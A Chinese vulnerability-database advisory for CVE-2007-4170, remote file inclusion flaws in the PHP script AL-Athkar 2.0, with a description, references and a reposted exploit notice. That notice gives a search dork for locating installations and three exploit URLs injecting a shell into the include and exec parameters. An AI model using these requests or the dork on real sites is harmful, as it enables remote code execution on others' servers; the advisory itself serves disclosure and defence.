AL-Athkar 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1189544 漏洞类型 未知
发布时间 2007-08-07 更新时间 2007-08-07
CVE编号 CVE-2007-4170 CNNVD-ID CNNVD-200708-090
漏洞平台 N/A CVSS评分 10.0
|漏洞来源
https://www.securityfocus.com/bid/85503
https://cxsecurity.com/issue/WLB-2007080031
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-090
|漏洞详情
AL-Athkar2.0版本中存在多个PHP远程文件包含漏洞。远程攻击者可以借助(1)对include参数(a)Main.php的和(b)get.php以及(2)对(c)count.php的exec参数中的一个URL,执行任意PHP代码。
|漏洞EXP
Discovred By : Hasadya Raed
----------------------------
Contact : RaeD (at) BsdMail (dot) Com [email concealed] , Hacker_Web (at) W (dot) Cn [email concealed] , Gunman_Pump (at) Hotmail (dot) Com [email concealed]
----------------------------
Greetz : Fairoz
----------------------------
Script: AL-Athkar.v2.0
----------------------------
Download: http://delmaa.com/upfile/users/AL-Athkar.v2.0.rar
----------------------------
Dork: "AL-Athkar.v2.0"
----------------------------
B.File: 
index.php
----------------------------
Vuln code:Main.php?include
Vuln code:get.php?include
Vuln code:count.php?exec
----------------------------
Exploit:
Http://www.Victim.com/path/count.php?exec=[Shell-Attack]
Http://www.Victim.com/path/Main.php?include=[Shell-Attack]
Http://www.Victim.com/path/get.php?include=[Shell-Attack]
----------------------------
<----!Team Hackers Israel----!>
|受影响的产品
Al-Athkar Al-Athkar 2.0
|参考资料

来源:BUGTRAQ
名称:20070804AL-Athkar.v2.0RemoteFileInclude
链接:http://www.securityfocus.com/archive/1/archive/1/475646/100/0/threaded
来源:XF
名称:alathkar-include-file-include(35818)
链接:http://xforce.iss.net/xforce/xfdb/35818
来源:SREASON
名称:2964
链接:http://securityreason.com/securityalert/2964